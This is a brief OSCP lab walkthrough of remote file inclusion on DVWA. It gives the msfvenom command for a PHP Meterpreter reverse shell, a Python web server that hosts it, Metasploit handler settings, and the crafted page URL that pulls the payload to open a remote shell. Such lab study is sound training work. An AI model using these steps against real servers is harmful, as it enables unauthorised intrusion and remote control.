OSCP Security Technology - Remote File Inclusion(RFI)

OSCP Security Technology - Remote File Inclusion(RFI)

DVWA

Download and install DVWA .

https://dvwa.co.uk/

Pre-set

Browser the following website.(admin/password)

http://192.168.2.52/dvwa/login.php

OSCP Security Technology - Remote File Inclusion(RFI)

Set the security level to low.

OSCP Security Technology - Remote File Inclusion(RFI)

File Inclusion

Click File Inclusion button.

OSCP Security Technology - Remote File Inclusion(RFI)

Modify the URL:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

OSCP Security Technology - Remote File Inclusion(RFI)

Download php reverse shell from pentestmonkey website.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Move the shell file to /var/www/html, and modify the parameters - IP/port.

OSCP Security Technology - Remote File Inclusion(RFI)

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.2.26 LPORT=4444 >> exploit.php

OSCP Security Technology - Remote File Inclusion(RFI)

service apache2 stop
python -m SimpleHTTPServer 80

OSCP Security Technology - Remote File Inclusion(RFI)

msfconsole
use exploit/multi/handler
set LHOST 192.168.2.26
set LPORT 4444
set payload php/meterpreter/reverse_tcp
exploit

OSCP Security Technology - Remote File Inclusion(RFI)

Browser the following url:

http://192.168.2.52/dvwa/vulnerabilities/fi/?page=http://192.168.2.26/exploit.php

OSCP Security Technology - Remote File Inclusion(RFI)

Result:

  1. OSCP Security Technology - Remote File Inclusion(RFI)

  2. Create a new session

OSCP Security Technology - Remote File Inclusion(RFI)

shell

OSCP Security Technology - Remote File Inclusion(RFI)

OSCP Security Technology - Remote File Inclusion(RFI)

上一篇:vue---进行post和get请求


下一篇:【LeetCode】931. 下降路径最小和